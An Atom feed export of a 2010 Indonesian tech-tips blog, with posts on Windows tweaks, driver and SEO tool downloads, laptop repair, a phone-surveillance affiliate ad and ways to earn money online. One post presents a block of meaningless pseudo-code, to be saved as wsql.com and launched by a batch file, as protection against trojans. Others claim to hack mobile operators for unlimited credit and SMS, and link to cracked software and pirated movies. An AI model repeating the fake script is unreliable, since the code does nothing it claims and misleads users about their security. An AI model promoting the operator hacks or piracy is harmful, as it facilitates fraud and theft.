title=""&gt;-  Tweak for performance systems, such as non-respondins end auto  applications, auto restart shell, Uload DLL from memory, and others.&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;- Optimization services, such as Disable Superfetch service,  the Windows Security Center, Windows Time service, printer spooling,  Tablet PC, Windows Update and Windows Aero user interface.&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;Security Settigs&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;- Administrative  restriction, like disabled registry editor, command prompt, task  manager, the MMC snap-ins, WinKey Control, System Restore, changing the  color and appearance, Control Panel, and other autoplay.&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;- Windows Explorer Restriction: Disable folder options,  eliminating the security tab, features CD burning and eliminate the  default explorer menu contents.&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;- Windows  Application Restriction, such as disabling the Windows media center,  sound recorder, Windows Defender, Sidebar, error reportin and windows  mobility center.&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;- Windows Update Settings&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;Network Tweaks&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;- Various tweaks on  network&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;- Otimalisasi bandwidth&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;Internet Explorer&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;- Reset IE to  default settings (defaut)&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;- General, such as  changing judu window, the download directory and the other&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;- Various settings on the Tab and Advanced configuration&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;Additional Tweaks&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;- Displays a  context menu for drives and folders are also files and folders.&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;- Various other tweaks, such as disable Hibernation, windows  startup sound, pagefile, encryption and other.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;Download&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;Ultimate Windows Tweaker v2, a  Tweak UI for Windows 7 &amp;amp; Vista | The Windows Club (Size 139 KB zip,  exe files about 345 KB)&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;This program can not  be used to tweak Windows XP. &lt;/span&gt;&lt;span title=""&gt;If you want to  customize some hidden settings, can use the TweakUI which can be  downloaded from the page Microsoft PowerToys for Windows XP&lt;/span&gt;&lt;/span&gt;&lt;a rel="nofollow" href="http://www.microsoft.com/windowsxp/downloads/powertoys/xppowertoys.mspx" target="_blank"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-6054699422596129680?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/6054699422596129680/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/11/tips-optimasi-windows-7.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/6054699422596129680'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/6054699422596129680'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/11/tips-optimasi-windows-7.html' title='Tips Optimasi Windows 7'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-449902981723240144</id><published>2010-10-22T05:51:00.000-07:00</published><updated>2010-10-22T06:00:11.189-07:00</updated><title type='text'>Driver Reltek XP sound Universal</title><content type='html'>Buat laptop Yang habis Instal Ulang tapi Drivernya Tidak Suport Lagi atau Rusak Ni saya kasih Hasil Ciptaan Aku sendiri 100 % tidak ada virus coba aja scan, dan ini khusus untuk Xp bukan untuk selain Xp, untuk Drivernya Tunggu Posting berikutnya soalnya masih dalam Uji Coba 10 Tipe Laptop.&lt;br /&gt;&lt;a href="http://www.ziddu.com/download/12189802/RELTEKUNIVERSAL.rar.html"&gt;Download&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-449902981723240144?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/449902981723240144/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/10/driver-reltek-xp-sound-universal.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/449902981723240144'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/449902981723240144'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/10/driver-reltek-xp-sound-universal.html' title='Driver Reltek XP sound Universal'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-3945456022169790541</id><published>2010-10-19T04:40:00.000-07:00</published><updated>2010-10-19T05:09:02.188-07:00</updated><title type='text'>Tips dan Trik Memperbaiki Laptop sendiri</title><content type='html'>Umum nya anda yang punya laptop selal dipusingi berbagai permasalahan baik ulah virus atau hardware nya di sini, saya memberi saran buat anda yang ingin memperbaiki laptop tanpa perlu keservis. Jika anda terlalu kesulitan dalam mengalami permasalahan, anda bisa langsung Email saya gratis untuk memperbaiki sendiri[&lt;a href="http://www.ziddu.com/downloadlink/12145342/TIPSDANTRIK.pdf"&gt;download Tipsnya&lt;/a&gt;]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;semua yang saya tulis dalam article di sesuaikan dengan berbagai permasalahan yang anda pada Laptop semua jenis.&lt;br /&gt;&lt;br /&gt;Trimkasih&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-3945456022169790541?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/3945456022169790541/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/10/tips-dan-trik-memperbaiki-laptop.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/3945456022169790541'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/3945456022169790541'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/10/tips-dan-trik-memperbaiki-laptop.html' title='Tips dan Trik Memperbaiki Laptop sendiri'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-4537484461621801071</id><published>2010-10-04T10:58:00.000-07:00</published><updated>2010-11-01T22:56:56.683-07:00</updated><title type='text'>Merawat Komputer yang terpasang pada jaringan</title><content type='html'>Biasanya kita tak sadar akan suatu permasahan yang di peroleh pada saat melakukan surfing antar browser atau melakukan game online, di sini pada pembaca saya ajak untuk merawat komputer bahwa kan laptop yang sering tersambung antar internet.&lt;br /&gt;Pertama yang perlu di pergunakan adalah kecepatan dari internet anda; jika anda menggunakan perangkat speed internet. Maka anda membutuhkan software yang mampu mengontrol kecepatan koneksi anda seperti &lt;span style="color: rgb(0, 0, 153);"&gt;CfosSpeedModem/ADSL&lt;/span&gt;,&lt;span style="color: rgb(0, 0, 153);"&gt;Monitor Speed&lt;/span&gt;, dan &lt;span style="color: rgb(0, 0, 153);"&gt;Control ADSL&lt;/span&gt;, untuk software yang bisa di download di google sendiri atau 4shared.&lt;br /&gt;&lt;br /&gt;tahap ke 1:&lt;br /&gt;Gunakan TuneUp 2010 untuk mengurangi turunnya kinerja baik Browser atau Jaringan, ( selalu di Cleaning).&lt;br /&gt;&lt;br /&gt;tahap ke 2:&lt;br /&gt;Di tiap sehabis koneksi anda defrag manual melalui windows bawahan.&lt;br /&gt;&lt;br /&gt;tahap ke 3:&lt;br /&gt;Gunakan Antivirus yang terbaik untuk memproteksi jaringan yang mengandung berbahasa, contoh antivirus yang mampu mengatasi proteksi jaringan browser atau Network yang terbuka &lt;span style="color: rgb(0, 0, 153);"&gt;AVAST PRO 5&lt;/span&gt;, anti virus tersebut tepat di gunakan untuk proteksi virus.&lt;br /&gt;&lt;br /&gt;Tahap ke 4:&lt;br /&gt;Walau pun antivirus masih bisa tertembus oleh virus untuk mengakali agar virus tak bisa masuk walaupun sejenis Trojan kecuali virus yang di susun dari bahasa Assemble,;&lt;br /&gt;Ketik atau kopi paste Kode berikut pada notepad:&lt;br /&gt;&lt;br /&gt;#&gt;wpsq.32&lt;br /&gt;copy.sys32&lt;34Bb2Tf1900wSp1000&gt;&lt;br /&gt;copy.Driver=var22.input.hearware&lt;H/00001&gt;&lt;br /&gt;copy.Driver=var22.input.hearware&lt;H/00gb3&gt;&lt;br /&gt;copy.Driver=var22.input.hearware&lt;H/11001&gt;&lt;br /&gt;copy.Driver=var22.input.hearware&lt;H/00001&gt;&lt;br /&gt;copy.Driver=var22.input.hearware&lt;H/01100&gt;&lt;br /&gt;copy.Driver=var22.input.hearware&lt;H/00100&gt;&lt;br /&gt;copy.Driver=var22.input.hearware&lt;H/00111&gt;&lt;br /&gt;copy.Driver=var22.input.hearware&lt;H/01101&gt;&lt;br /&gt;copy.Driver=var22.input.hearware&lt;H/00000&gt;&lt;br /&gt;copy.Driver=var22.input.hearware&lt;H/00000&gt;&lt;br /&gt;copy.Driver=var22.input.hearware&lt;H/00000&gt;&lt;br /&gt;copy.Driver=var22.input.hearware&lt;H/00000&gt;&lt;br /&gt;copy.Driver=var22.input.hearware&lt;H/00000&gt;&lt;br /&gt;copy.Driver=var22.input.hearware&lt;H/00000&gt;&lt;br /&gt;Var22.output&lt;sys33&gt;.&lt;Vivo&gt;&lt;br /&gt;Clean.sys32&lt;Dir/search&gt;&lt;br /&gt;delete.sys32&lt;wsql&gt;&lt;br /&gt;Manipulasi sys33&lt;br /&gt;copy.sys32&lt;#sys33#&gt;&lt;br /&gt;&lt;br /&gt;Simpan dengan nama wsql.com&lt;br /&gt;&lt;br /&gt;buka note pad dan tulis:&lt;br /&gt;reg wsql.com, sys32.com&lt;br /&gt;simpan dengan Run.bat&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-4537484461621801071?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/4537484461621801071/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/10/merawat-komputer-yang-terpasang-pada.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/4537484461621801071'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/4537484461621801071'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/10/merawat-komputer-yang-terpasang-pada.html' title='Merawat Komputer yang terpasang pada jaringan'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-4726128986992320293</id><published>2010-08-14T23:14:00.000-07:00</published><updated>2010-08-14T23:15:04.008-07:00</updated><title type='text'>Cell phone video surveillance solution</title><content type='html'>&lt;p&gt;&lt;br /&gt;&lt;h2&gt;Wireless mobile phone video security solution is  here adding a sense of private protection and safety it offers you  real-time video monitoring.&lt;/h2&gt;&lt;br /&gt;&lt;img src="http://www.bigextracash.com/images/mobigarda200_3.gif" hspace="10" border="0" align="left" alt="Wireless cellular phone video surveillance  solution" /&gt;&lt;br /&gt;This know-how utilizes the most powerful software &lt;a href="http://www.bigextracash.com/aft/09fe7612/11110050.html" title="Wireless mobile phone video surveillance  solution"&gt;applications&lt;br /&gt;for distantly monitoring&lt;/a&gt; from  Everywhere in the world.&lt;br /&gt;&lt;br /&gt;This is a solution that will turn  any regular mobile phone into a high end surveillance device.&lt;br /&gt;&lt;br /&gt;The  surveillance system brings video from video source such as USB or IP  Webcam to your mobile phone. It contains both the client and server  application.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;You can view your residence,  business, babysitter, parents, pets, etc.&lt;/h2&gt;&lt;br /&gt;You can view  live shots from your cameras on mobile phone through&lt;br /&gt;any kind of ip  connection from any location in the globe.&lt;br /&gt;In case of invasion, a  real scene helps prevent false alarm and cancel police dispatches to  avoid the fines.&lt;br /&gt;&lt;br /&gt;Enjoy the autonomy of watching all your  cameras&lt;br /&gt;on cell phone anytime and from anywhere with just the press  of a button.&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;br /&gt;&lt;h2&gt;How does  mobile surveillance work:&lt;/h2&gt;&lt;br /&gt;You attach your camera (USB, IP  camera, or Camcoder) to your home pc&lt;br /&gt;and setup the &lt;a href="http://www.bigextracash.com/aft/09fe7612/11110050.html" title="Wireless mobile phone video security  solution"&gt;software&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;The application records  video and audio from camera and sends it, as compressed&lt;br /&gt;media  stream, to web server.&lt;br /&gt;&lt;br /&gt;You login to this Web server from  your mobile phone and view your camera.&lt;br /&gt;&lt;br /&gt;No special software  for your mobile phone is needed.&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;br /&gt;&lt;a href="http://www.bigextracash.com/aft/09fe7612/11110050.html" title="Wireless mobile phone video security solution"&gt;All regarding  mobile video surveillance.&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-4726128986992320293?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/4726128986992320293/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/08/cell-phone-video-surveillance-solution.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/4726128986992320293'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/4726128986992320293'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/08/cell-phone-video-surveillance-solution.html' title='Cell phone video surveillance solution'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-4626283502677400873</id><published>2010-08-13T05:07:00.000-07:00</published><updated>2010-08-13T05:19:58.646-07:00</updated><title type='text'>Rahasia HP Samsung E200i</title><content type='html'>Sering kali kita ketahu cara-cara Underground Hack Pulsa dengan komputer atau software, nah di sini akan saya ungkap cara Hack Operator dengan Hp dengan Type Samsung E200i, saya sudah membuktikannya mulai Pulsa Unlimitied, SMS Unlimitid bahkan Internet Via Hp atau kekomputer yang benar-benar unlimitid, tapi di sini saya hanya mengajarkan cara hanya 1 saya, cheat SMS unlimited.&lt;br /&gt;&lt;br /&gt;cara nya cukup panjang jadi biar tidak banyak tulisan; aku kasih articlenya aja ya???..&lt;br /&gt;&lt;a href="http://www.ziddu.com/download/11196829/RAHPAMUNGE200i.rar.html"&gt;download&lt;/a&gt; di sini biar lebih capet.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-4626283502677400873?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/4626283502677400873/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/08/rahasia-hp-samsung-e200i.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/4626283502677400873'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/4626283502677400873'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/08/rahasia-hp-samsung-e200i.html' title='Rahasia HP Samsung E200i'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-1154920126871019414</id><published>2010-08-12T06:54:00.000-07:00</published><updated>2010-11-01T22:56:56.688-07:00</updated><title type='text'>SMS Gratis dengan SAMSUNG E200i</title><content type='html'>Ni saya punya solusi sama orang-orang yang punya hp samsung E200i tipe Update, rupanya benar sekali semua rahasia yang di miliki hp samsung sangat top. Jika anda sempat menengok Blog saya jangan lupa ni satu article karena sudah saya buktikan dengan memakai berbagai layanan operator selluler mulai dari cara menambah pulsa hp dengan cheat, setelah itu teknik SMS gratis sampai tangan bengkak bahkan ngenet memakai operamini hingga download Aplikasi aplikasi Hp 0 rupiah, ini tau caranya; nigue kasih tapi yang biasa aja dulu ya cuma SMS gratis bukan teknik cheat pulsa unlimeted. ok bukan biar tidak serakah.&lt;br /&gt;&lt;br /&gt;Caranya cukup mudah;&lt;br /&gt;AXIS dulu aja yang&lt;br /&gt;Hp Samsung Khusus E200i (kalau yang lain belum coba, karena hp yang punya cuma itu aja, heee....&lt;br /&gt;&lt;br /&gt;caranya biasa kaya aktifasi kartu biasa tapi&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-1154920126871019414?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/1154920126871019414/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/08/sms-gratis-dengan-samsung-e200i.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/1154920126871019414'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/1154920126871019414'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/08/sms-gratis-dengan-samsung-e200i.html' title='SMS Gratis dengan SAMSUNG E200i'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-2013506358947570385</id><published>2010-08-07T19:23:00.000-07:00</published><updated>2010-08-07T19:32:52.533-07:00</updated><title type='text'>Free Moves and watch</title><content type='html'>apa anda kesulitan mendapatkan movie movie yang baru?....&lt;br /&gt;Download lama mendingan langsung dari temen aja!?...&lt;br /&gt;Males download-download emang ada film movie baru?.. Jelas ada&lt;br /&gt;cara agar cepet download uda saya kasih tahu di blog ini tinggal anda buka sendiri aja? ya..ya&lt;br /&gt;Movie2k adalah program yang penyedia movie film film baru dari pada anda capek-capek buka mba google mendingan langsung di ke sini aja &lt;a href="http://adf.ly/4wI1"&gt;GOOOO Ready.....&lt;/a&gt;?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-2013506358947570385?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/2013506358947570385/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/08/free-moves-and-watch.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/2013506358947570385'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/2013506358947570385'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/08/free-moves-and-watch.html' title='Free Moves and watch'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-4937387311892361277</id><published>2010-07-03T02:35:00.000-07:00</published><updated>2010-11-01T22:56:56.693-07:00</updated><title type='text'>Cari uang di internet</title><content type='html'>Biasanya kita tahu bahwa internet apa mampu memberikan uang ke kita-kita atau anda, sebenarnya jawaban itu di tujukan ke kita atau anda, apa anda mampu menghasilkan uang dari internet itu jawabannya kita cari selama-selama ini. Jika saya menjawab itu benar dan juga anda yang tidak benar, salah satunya.&lt;br /&gt;&lt;br /&gt;di saat kita mencoba mencari di internet dan mendapatkan situs menghasilkan uang secara fokus kita terpaku pada hal yang seperti itu, apa pula yang menganggap internet itu tidak menghasilkan apa-apa???.....???. Jawaban itu selalu mengambang di atas kepala kita jika orang lain berkata seperti itu, kecuali kita surveys - surveys dulu di setiap situs, agar anda merasa tidak terbohongi oleh suatu website yang mengiming-imingi uang yang besar hanya di tempu 2 jam????..... jelas itu bokongan. yang pasti anda siap sendiri untuk terjun kedunia internet lebih jauh lagi.&lt;br /&gt;&lt;br /&gt;ingat uang di dapatkan dari kerja keras kita sendiri bukan dari hasil penipuan atau merampok.&lt;br /&gt;Saya memang belum membuktikan kepada anda tapi saya sudah mengsurveys semua website yang menghasilkan uang recean dollar dan recean rupiah.&lt;br /&gt;&lt;br /&gt;agar anda tidak tertipu oleh website yang teriming-imingi jutaan dolar dalam waktu 1 jam atau 2 hari itu petunjuk saya;&lt;br /&gt;&lt;br /&gt;pertaman download dahulu add ons mozilla yang mengetahui;&lt;br /&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/downloads/latest/161868/addon-161868-latest.xpi"&gt;SEO stats&lt;br /&gt;&lt;/a&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/downloads/latest/52177/addon-52177-latest.xpi"&gt;webrank&lt;/a&gt;&lt;br /&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/downloads/latest/156485/addon-156485-latest.xpi"&gt;livepageranks&lt;/a&gt;&lt;br /&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/downloads/latest/10777/addon-10777-latest.xpi"&gt;LiveExtend&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;tak hanya itu saja masih banyak yang lain, untuk add on mozilla. Setelah anda download lalu anda instal dengan cara Drag drop ke mozilla.&lt;br /&gt;&lt;br /&gt;Nah di sini saya akan ajak untuk mencari penghasilan yang sesuai dengan motifasi kita. Pada dasarnya kita harus mencari dulu di mbah google.&lt;br /&gt;&lt;br /&gt;Banyak sekali sih penghasil dollar yang membayar kita. di antaranya program,&lt;br /&gt;PTC&lt;br /&gt;PPC&lt;br /&gt;MPC&lt;br /&gt;PCG&lt;br /&gt;dan masil puanjang banget...&lt;br /&gt;&lt;br /&gt;ikuti saran saya dulu web yang benar-benar membayar kita;&lt;br /&gt;pertama daftar aja dulu ke PTC rupiah lumayan buat beli rokok sebatang.&lt;br /&gt;&lt;a href="http://klikajadeh.com/?r=df12"&gt;klikajadeh&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;buka dan regis&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-4937387311892361277?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/4937387311892361277/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/07/cari-uang-di-internet.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/4937387311892361277'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/4937387311892361277'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/07/cari-uang-di-internet.html' title='Cari uang di internet'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-1509818478355939788</id><published>2010-06-28T05:32:00.000-07:00</published><updated>2010-06-28T05:43:01.491-07:00</updated><title type='text'>cara mempromosikan secara instalan</title><content type='html'>Buat anda yang pengen website atau blog memiliki banyak pengunjung dan mendapatkan Page rank yang memuaskan, bisa dengan berbagai cara salah satu cara dengan menggunakan software khusus,&lt;br /&gt;di sini anda akan mendapatkan pengunjung memuaskan per harinya bisa 100 hingga 1000 perhari,dengen seperti itu?.&lt;br /&gt;tool tool untuk mempromosikan website anda di antaranya:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ziddu.com/downloadlink/10479672/suryapro.rar"&gt;Submit Pro&lt;/a&gt;&lt;br /&gt;submitwolf&lt;br /&gt;Submit RSS&lt;br /&gt;Seo Elite&lt;br /&gt;&lt;a href="http://www.ziddu.com/downloadlink/10479770/SEOToolkit3.exe"&gt;SEOToolkit&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.ziddu.com/downloadlink/10479809/sitebubmit.rar"&gt;sitebubmit&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Nah program tersebut bisa di download dimana aja, untuk mempercepat download di sini saja. buat anda yang suka mengumpulkan software-software program ini bisa di jadikan rujukan.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-1509818478355939788?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/1509818478355939788/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/06/cara-mempromosikan-secara-instalan.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/1509818478355939788'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/1509818478355939788'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/06/cara-mempromosikan-secara-instalan.html' title='cara mempromosikan secara instalan'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-2045364816548515483</id><published>2010-06-24T08:50:00.000-07:00</published><updated>2010-06-24T08:55:27.321-07:00</updated><title type='text'>mempercepat internet via CfosSpeed</title><content type='html'>untuk meningkatkan kecepatan internet anda bisa menggunakan to &lt;a href="http://www.ziddu.com/downloadlink/10426342/CFosSpeed_v4.5.2009_Full.rar"&gt;CFosSpeed&lt;/a&gt;, cara kerja CfosSpeed membuat suatu virtual DDaemo netword sehingga secara virtual,&lt;br /&gt;mampu menggabungkan kecepatan normal menjadi Good very sehingga baik kerja windows system perlu di perhatikan, jika kecepatan di targetkan menjadi satu mampu menjadi very-very is good.&lt;br /&gt;ini yang membuat kerja system di tentukan, software ini hanya bersifat virtualisasi clien to clien speed.&lt;br /&gt;oke saya akan berikan caranya: download terlebih dahulu versi Full di sini.&lt;br /&gt;setelah terinstal klik kanan pada pojok kanan options ----&gt; settings&lt;br /&gt;-------------------------------------------------------------------------------------------------&lt;br /&gt;dalam tampilan baru pilih special&lt;br /&gt;naikan pada DNS Clien (DNS_C) ke higher&lt;br /&gt;naikan pada DNS server (DNS_S) ke higher&lt;br /&gt;dan untuk yang lain ubah ke high (jika di naikan Max. system akan hang,terhenti)&lt;br /&gt;&lt;br /&gt;lalu masuk ke Clien Protocols&lt;br /&gt;ubah semua ke mode high ke kecuali 